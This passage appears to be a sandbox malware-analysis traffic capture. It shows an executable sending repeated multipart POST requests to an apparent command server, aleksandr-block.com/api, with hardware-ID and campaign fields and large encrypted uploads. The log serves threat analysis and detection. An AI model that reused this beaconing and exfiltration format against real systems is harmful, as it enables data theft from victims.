2025-01-14 07:55:35 UTC	2831	OUT	Data Raw: 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 Data Ascii: jf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{s
2025-01-14 07:55:35 UTC	1133	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:55:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2jnhbk14c12ec6ah43d50r3kc4; expires=Sat, 10 May 2025 01:42:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2BHfOJgkxsIygvlKMD5myNK2GvrFKHTxR9TVutAjTus47KB9yGRc05NL617UDWEuocHeMe%2FPK4iIPOdTZgatdAy1%2BqtWcscha%2FbzmEx0P7JmFh5LmvAlKtR%2FGxBIUHbnkpqBr2ka"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901c1089beb78c83-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1994&rtt_var=754&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19127&delivery_rate=1444114&cwnd=189&unsent_bytes=0&cid=b74f43ea75be17e8&ts=638&x=0"
2025-01-14 07:55:35 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 07:55:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	188.114.96.3	443	6372	C:\Users\user\Desktop\k7h8uufe6Y.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:55:36 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Y37LJYQD8D User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8735 Host: aleksandr-block.com
2025-01-14 07:55:36 UTC	8735	OUT	Data Raw: 2d 2d 59 33 37 4c 4a 59 51 44 38 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 33 43 42 34 45 38 41 37 42 30 38 32 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 59 33 37 4c 4a 59 51 44 38 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 33 37 4c 4a 59 51 44 38 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 44 69 46 69 0d 0a 2d 2d 59 33 37 4c 4a 59 51 44 38 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --Y37LJYQD8DContent-Disposition: form-data; name="hwid"7D3CB4E8A7B08222B960CC18D99B375A--Y37LJYQD8DContent-Disposition: form-data; name="pid"2--Y37LJYQD8DContent-Disposition: form-data; name="lid"BbL7Kk--DiFi--Y37LJYQD8DContent-D
2025-01-14 07:55:37 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:55:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tbh7fm3uo1gmk3j9prqad2bfhi; expires=Sat, 10 May 2025 01:42:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0eaKPNorj5IZGgy40Eacxg7mIJ7cpz3zEybTf9alwy2Y2pV0VzDgO6f2Rn6TED8EOp%2FMckIgRvKYAPd4hjoUBW9X8Zg4qs%2B94NVzzj1RxLKTRH0VmdoIJ%2Bk3RmhxzVRkqZs2m7qD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901c1091dd3cc3ff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1613&rtt_var=614&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9669&delivery_rate=1767554&cwnd=246&unsent_bytes=0&cid=63b0d093950a4224&ts=471&x=0"
2025-01-14 07:55:37 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 07:55:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	188.114.96.3	443	6372	C:\Users\user\Desktop\k7h8uufe6Y.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:55:37 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=G5EA8LGBP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20382 Host: aleksandr-block.com
2025-01-14 07:55:37 UTC	15331	OUT	Data Raw: 2d 2d 47 35 45 41 38 4c 47 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 33 43 42 34 45 38 41 37 42 30 38 32 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 47 35 45 41 38 4c 47 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 47 35 45 41 38 4c 47 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 44 69 46 69 0d 0a 2d 2d 47 35 45 41 38 4c 47 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --G5EA8LGBPContent-Disposition: form-data; name="hwid"7D3CB4E8A7B08222B960CC18D99B375A--G5EA8LGBPContent-Disposition: form-data; name="pid"3--G5EA8LGBPContent-Disposition: form-data; name="lid"BbL7Kk--DiFi--G5EA8LGBPContent-Dispo
2025-01-14 07:55:37 UTC	5051	OUT	Data Raw: 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
2025-01-14 07:55:38 UTC	1133	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:55:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lu33jo6saa3mr7pcnfmnrbv0o3; expires=Sat, 10 May 2025 01:42:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ay7%2FELXDRI91BdhO6mgk%2BaXLcL7j0j2fP1%2BCd7L09txQCLl1G7G3oUrGsdurIVE1iqH5P%2FVBFG0CD48w15pqZtQyxOdY%2BUcnszxMyycZWHtbQaUNV1N0DVSGgqKux6xrVxQu71U"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901c109a7b8a42cc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1914&min_rtt=1905&rtt_var=733&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21338&delivery_rate=1474003&cwnd=169&unsent_bytes=0&cid=2080e5c4b5153754&ts=640&x=0"
2025-01-14 07:55:38 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 07:55:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	188.114.96.3	443	6372	C:\Users\user\Desktop\k7h8uufe6Y.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:55:39 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LXKDWNMZMX14A User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1375 Host: aleksandr-block.com
2025-01-14 07:55:39 UTC	1375	OUT	Data Raw: 2d 2d 4c 58 4b 44 57 4e 4d 5a 4d 58 31 34 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 33 43 42 34 45 38 41 37 42 30 38 32 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4c 58 4b 44 57 4e 4d 5a 4d 58 31 34 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 58 4b 44 57 4e 4d 5a 4d 58 31 34 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 44 69 46 69 0d 0a 2d 2d 4c 58 4b 44 57 4e 4d 5a 4d 58 31 34 Data Ascii: --LXKDWNMZMX14AContent-Disposition: form-data; name="hwid"7D3CB4E8A7B08222B960CC18D99B375A--LXKDWNMZMX14AContent-Disposition: form-data; name="pid"1--LXKDWNMZMX14AContent-Disposition: form-data; name="lid"BbL7Kk--DiFi--LXKDWNMZMX14
2025-01-14 07:55:39 UTC	1134	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:55:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nsfgukgoqt6cfkgpskhjj2jju7; expires=Sat, 10 May 2025 01:42:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eOvXRdfNLSyF1q6zqnmtCdQ%2FekdhLa13feNBgotBGJjBJzT8NP8k1uL0I3yAO%2BLV%2BbLPLropFnqT3uGFgL%2Bbpy%2B2zxN%2B9iDEgsjNrsESMrgq3GwcTXQtblMZV%2F0cyaFNdBgoHbAM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901c10a32ba97277-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=2005&rtt_var=771&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2290&delivery_rate=1403171&cwnd=225&unsent_bytes=0&cid=db1f0b4d20a3d8ee&ts=430&x=0"
2025-01-14 07:55:39 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 07:55:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	188.114.96.3	443	6372	C:\Users\user\Desktop\k7h8uufe6Y.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:55:40 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FJED22COG702CX08 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 594028 Host: aleksandr-block.com
2025-01-14 07:55:40 UTC	15331	OUT	Data Raw: 2d 2d 46 4a 45 44 32 32 43 4f 47 37 30 32 43 58 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 33 43 42 34 45 38 41 37 42 30 38 32 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 46 4a 45 44 32 32 43 4f 47 37 30 32 43 58 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 4a 45 44 32 32 43 4f 47 37 30 32 43 58 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 62 4c 37 4b 6b 2d 2d 44 69 46 69 0d 0a 2d 2d 46 4a 45 Data Ascii: --FJED22COG702CX08Content-Disposition: form-data; name="hwid"7D3CB4E8A7B08222B960CC18D99B375A--FJED22COG702CX08Content-Disposition: form-data; name="pid"1--FJED22COG702CX08Content-Disposition: form-data; name="lid"BbL7Kk--DiFi--FJE
2025-01-14 07:55:40 UTC	15331	OUT	Data Raw: dc 77 b5 5a a7 c9 d6 9d d0 46 95 a7 ca a5 c2 de 5c d1 29 e3 f8 f5 83 bb 7f b4 92 0d df 54 26 91 ce 39 3f af e0 27 9c a5 40 21 86 fd a7 29 05 4b f6 ae 74 19 e8 8e 7e 51 36 58 2c ba 56 78 1b 03 4c 1e 1f 0e ec 4f f3 69 7f ff 28 4b f1 03 4f f5 94 a9 28 88 2f e3 5d 72 f8 15 a3 0b f3 a6 47 42 dc 69 2c e3 49 14 06 9c 6e a1 84 cb 7c a1 fc 05 02 11 16 27 86 0e 37 4a 80 02 20 c6 53 02 c8 79 84 a2 a0 b9 28 ce 2c 2e 3c 63 c7 fa 01 8e 87 28 48 0f ea 79 8a 38 f5 c1 90 a6 2e 6c 9f 29 bf f9 ef 72 62 3c 15 04 66 5b 48 90 0a 90 0c ec 7f 1b 61 46 80 3a d4 aa 3c a7 61 49 44 62 c3 60 0d 6d 25 ba d3 f2 bf fb 6e e1 fb 42 9a cf 63 85 90 de 16 15 91 00 32 fd 37 fb 3f 98 02 ef 56 63 0b f1 ae 58 9d 23 03 31 b3 f4 3a 14 fe d8 92 93 2c fa d2 47 a7 56 69 eb c2 39 f4 3c 25 01 62 7e 56 Data Ascii: wZF\)T&9?'@!)Kt~Q6X,VxLOi(KO(/]rGBi,In\|'7J Sy(,.<c(Hy8.l)rb<f[HaF:<aIDb`m%nBc27?VcX#1:,GVi9<%b~V
2025-01-14 07:55:40 UTC	15331	OUT	Data Raw: 0f 7e b7 93 60 7d 88 51 90 90 98 a9 f4 8c 30 87 a4 ae 62 49 0f 1a e1 86 0f a3 4d 78 f5 31 27 10 f2 44 47 24 f9 25 29 3a b2 fc b8 ba 0a db b2 23 d6 97 6e d8 5c c1 cd 57 29 3a 00 ac ef b6 62 e2 8d c9 79 b5 55 4b 67 3e 0e 9e 39 35 14 f3 71 64 fa 46 f5 da a5 80 16 d5 8f 65 bc 8d e1 b4 1b 03 f1 38 43 41 fb ef 5a 00 b3 5a f9 e3 6f 95 61 1b b7 8c 89 44 32 37 f0 b1 fd ea df b1 02 79 06 29 c1 6a 58 bf de cb 60 71 26 69 bc 49 14 80 77 cc b9 f2 ce 4f db 8f eb 6a 1f b7 e1 7b ff d7 2b 90 bc 80 99 4a 00 1b 57 a0 55 7f 99 f5 87 10 7d e2 d2 71 a0 93 22 73 03 98 fb ff 3e 1d 9b da 2e 7d d3 0f 42 02 05 ba e9 49 d2 ff 33 5e 3a 06 bf cf f0 04 3b c1 41 8c 20 53 8c b7 07 cc ed 50 97 42 c3 02 ec 65 31 91 09 e1 56 c8 69 3d 9c ad 30 2c 69 0f 4b 87 9e 07 7d ff 96 6f 78 be 33 cb 7a Data Ascii: ~`}Q0bIMx1'DG$%):#n\W):byUKg>95qdFe8CAZZoaD27y)jX`q&iIwOj{+JWU}q"s>.}BI3^:;A SPBe1Vi=0,iK}ox3z
2025-01-14 07:55:40 UTC	15331	OUT	Data Raw: c8 7c a6 af c7 ce b2 fe e2 8a 04 99 9f 8c e3 0f df df 13 cb 55 1f c6 3f f0 8d a3 fe e5 c5 24 63 0b 0c 8c c8 2f 78 2b 89 7b 15 9e 0a 23 cf ae c8 80 4b 9d d1 39 95 c8 77 50 cc de eb b3 91 89 22 9f 62 8b 6b 76 90 f5 43 dc 7a ec 20 00 70 a1 52 85 bb 12 61 b1 5e 29 46 ad 42 f2 88 b1 20 82 1b f7 e1 2d 19 fe 7c 34 f8 fd d1 19 26 21 53 ab 02 f2 88 49 9d 9d df e1 67 74 5b fc 97 fb 24 84 d6 1b 0d 79 9c 11 bf 60 c2 b4 ac f6 79 4b 6c 5f 5e 93 81 0d 49 05 51 74 7f 61 b4 da 36 82 14 03 26 30 2a 23 2e 12 64 85 d5 4e e1 a2 9a c2 48 9c 0a 16 d2 67 96 13 8c 1c 8f 0b b9 52 a1 69 be 5b 63 19 70 fd 30 9d 06 02 2a 68 76 be 4b b8 a8 39 c2 ed a0 b5 33 12 c2 04 0d a7 9a bc dc 5c dc 39 86 7e 0a 58 b3 08 b4 91 5f c5 63 55 ef e5 bb 5c 23 be 02 e6 76 81 6c a8 23 c4 e7 d2 19 8f c7 b1 Data Ascii: \|U?$c/x+{#K9wP"bkvCz pRa^)FB -\|4&!SIgt[$y`yKl_^IQta6&0#.dNHgRi[cp0hvK93\9~X_cU\#vl#
2025-01-14 07:55:40 UTC	15331	OUT	Data Raw: 38 1b 03 14 eb 2b cd 22 43 ca 18 41 73 9a 25 16 d7 e3 57 67 39 f0 0d 78 b1 7f 87 94 6f 04 2a 9f fe 82 db 70 cd 81 72 d9 fb ac 40 7e 75 53 e0 ee 2c 82 32 3e 5a 78 99 dc 27 67 7c e3 ac 71 86 b5 7e 43 7f 68 8a 18 66 7f 0d c1 43 ce 46 c8 df fe 68 b8 a0 0a 9f 7a 7d e8 80 f7 c5 17 1b 0e 83 f0 fc 05 82 2f 8b a9 20 b0 66 59 3a ac b5 7f 90 fa c7 bb e6 6c 90 55 81 ac 29 a4 63 5d a8 f5 a3 50 cc cb 09 84 c3 c8 a7 26 53 d1 4c c8 c3 a8 81 a4 cd 24 bf ad e0 05 8d dc 2b a2 24 2d 14 d9 fc 6f 57 6a 10 47 5f 15 f3 58 9b 61 50 1b 20 8e 85 b0 ff 9a 74 78 1e 4a fb ce 8b 95 57 47 ca b1 73 7d 8c 4d 3a a6 ab 4f 88 df fd 8c 39 f8 87 3e 21 5a 6f 6f 21 17 83 8a 78 90 11 e8 0a 3b bc d4 85 51 e6 3f ba 98 35 97 48 05 a4 2b d2 1e c6 5f a4 6e 21 ee 72 a8 f3 ef 1f 7f 0e 5a 9d c3 f0 65 f0 Data Ascii: 8+"CAs%Wg9xo*pr@~uS,2>Zx'g\|q~ChfCFhz}/ fY:lU)c]P&SL$+$-oWjG_XaP txJWGs}M:O9>!Zoo!x;Q?5H+_n!rZe
2025-01-14 07:55:40 UTC	15331	OUT	Data Raw: a7 3b ff 79 75 4d 00 b5 cf 3d f7 f9 37 43 3b d4 4b 7e 1a 0f fa e0 6c ee ff e6 1e e2 32 92 98 ff 21 ea 84 76 fd ed 2e 57 6b 21 1c 15 f0 80 32 2a 10 9b b2 ce 12 ff 56 6c 4f f5 28 52 ac 83 9b 3e 91 79 36 44 7e fb 46 66 c4 92 a7 a5 6c 18 ce 39 67 fa d2 3a c5 2e 9f f8 77 74 d5 44 44 42 03 bc 57 84 43 70 ee ea 4a cb df 34 7f c1 5b ec f4 74 a1 03 1a 5b fe f3 f2 90 9c 23 19 15 0c 22 93 f3 2f 96 c9 cb 86 97 52 f6 78 9f c8 18 b6 15 7f 29 16 a9 ce c3 77 99 2d ff cd 50 84 2b 8e c7 54 45 bd 6b df 65 69 49 81 36 1e 3e 8a 41 c0 12 4c 0c 6f 37 69 5e 8e f5 49 e9 9d 7c 59 b3 c0 3c f3 b3 95 20 76 97 86 4e 48 cf 04 b8 11 7f 81 3a bb cc 5b 42 11 3d c6 42 aa 02 be 7e 5c 84 45 4a 7c 64 0a d4 7c 40 3d 2d fb 32 27 5a 50 40 0e 34 68 70 74 7b 20 d2 6a cf ee a0 88 20 4e cb e1 d5 41 Data Ascii: ;yuM=7C;K~l2!v.Wk!2*VlO(R>y6D~Ffl9g:.wtDDBWCpJ4[t[#"/Rx)w-P+TEkeiI6>ALo7i^I\|Y< vNH:[B=B~\EJ\|d\|@=-2'ZP@4hpt{ j NA
2025-01-14 07:55:40 UTC	15331	OUT	Data Raw: 35 ff f9 f4 52 f6 40 5f 41 c0 d2 db 31 cb ac ba ad c8 4c e4 e2 cb c4 67 3f 04 02 d8 9d 4b ae 77 8d a6 44 50 43 d1 63 6a 6a fb 4e e3 e1 55 62 65 fb e3 e1 91 35 b9 69 a1 c5 b3 c1 69 ec db 89 6c 3e 19 6a b2 f1 e7 67 4b 0c 88 39 c5 b2 66 c8 67 66 18 5a fb 03 44 bd 10 b8 c9 12 af d7 35 4a 2f 65 c2 bd 43 dd 6e 4f 00 98 0e f3 07 71 52 94 f7 2d ed 08 22 3a 2e 73 33 d2 7f 55 68 fd ad 89 95 42 7a da 4f 2e 92 28 c0 d3 e4 60 99 81 ef 99 02 79 0d ea b8 6b 0a e5 ba 5f c2 54 10 0a b8 ab 37 12 fc b8 df f8 3a f3 00 1c b1 bd 4e df f4 22 a1 a6 de c8 30 ca 90 97 03 78 15 e6 35 ea 73 bf d7 68 22 4e ef 6c 03 4e 9d 71 cd aa 8f 49 e0 61 06 5b 0c 46 0d cb 7d 53 ff 21 8c 33 ae d9 33 c0 4c c0 78 a1 28 99 d8 42 34 85 12 c6 03 3e 5c 60 76 98 58 f4 a0 13 8e 51 f4 c5 3f 9f 71 8c df d8 Data Ascii: 5R@_A1Lg?KwDPCcjjNUbe5iil>jgK9fgfZD5J/eCnOqR-":.s3UhBzO.(`yk_T7:N"0x5sh"NlNqIa[F}S!33Lx(B4>\`vXQ?q
2025-01-14 07:55:40 UTC	15331	OUT	Data Raw: 68 54 68 3c 33 96 7c 49 e4 39 35 a5 29 11 2f 16 b7 ba d3 33 82 bf 60 08 ac 06 da 5a 09 4d c6 1c f7 4d 47 21 47 1d f3 fa d0 75 f6 cd ff 24 18 c0 21 36 d8 13 59 57 e1 3b 88 99 ae 8a a3 04 29 35 19 45 1b 99 99 d4 58 ae 4c 5c ca bd 4c 5c 19 e3 10 67 b3 cd d2 29 4d a6 60 8e ed 17 1c 1a 26 29 7d f7 59 0a 2d f9 a1 3b 30 46 7b a9 41 b9 25 9e 5d 90 a1 8c 28 ec 09 84 4f a2 6f 3f dd 26 8c c9 f3 25 9b b9 6c b8 4c 35 ab 80 76 3a a6 ef 53 7b 11 d5 00 19 94 71 c0 2a 44 5e 89 5a 3f a7 a4 c5 4c c9 11 c4 3c 8c 70 e4 83 b5 29 b8 c6 c7 86 56 94 f6 b7 92 7d 10 69 f4 77 47 bb 3a f6 ca 84 2e 47 15 bb ff 5d 50 d4 64 64 66 00 f4 ab b7 bb 96 ad 1d 51 9a e8 97 33 bb 83 4e 64 1e f6 aa 9c 01 cc ff 36 05 4b 73 cf 3d 7e f2 9f a8 5e d9 82 00 10 74 66 94 12 1b 11 d9 e7 76 80 e7 96 61 49 Data Ascii: hTh<3\|I95)/3`ZMMG!Gu$!6YW;)5EXL\L\g)M`&)}Y-;0F{A%](Oo?&%lL5v:S{q*D^Z?L<p)V}iwG:.G]PddfQ3Nd6Ks=~^tfvaI
2025-01-14 07:55:40 UTC	15331	OUT	Data Raw: e0 05 d6 d9 5a 25 45 7c ab dd 6b 9e ae a4 d7 cc ea f8 95 ad 97 d8 8d 8c 19 df f6 5b 0e b7 3f cf f3 9e 10 27 10 fe 36 f4 e3 50 ee ba fa 0b a1 1f 62 a2 df 7a 04 94 84 70 71 61 25 9c 63 f9 bb ca a8 c5 c4 7f 3f bf 78 a3 7d e7 c2 b1 b0 9a 97 b7 c4 53 6c 96 a8 e3 56 a6 34 47 40 ed 36 a3 5e 94 5a 90 8c 3e 20 00 2c 79 59 15 d2 80 71 c7 ba d7 f6 cb 05 c3 a0 53 f7 2e c1 f1 6e 69 10 75 f7 df 53 bd 32 3d d2 f7 86 a0 a6 0a a1 71 dd 79 31 30 d4 5e 7c e1 88 36 30 0c 02 57 e4 08 ec 13 0f 92 a8 99 30 ea c5 00 60 cf e4 46 0c 3f 26 97 c3 c8 b1 64 1e b8 bd 36 6c ff 1f 88 9c da f0 84 e1 fb a7 18 4b 88 b1 66 04 33 c9 a7 e4 c9 6f bc 07 5d 38 7b 18 e0 de 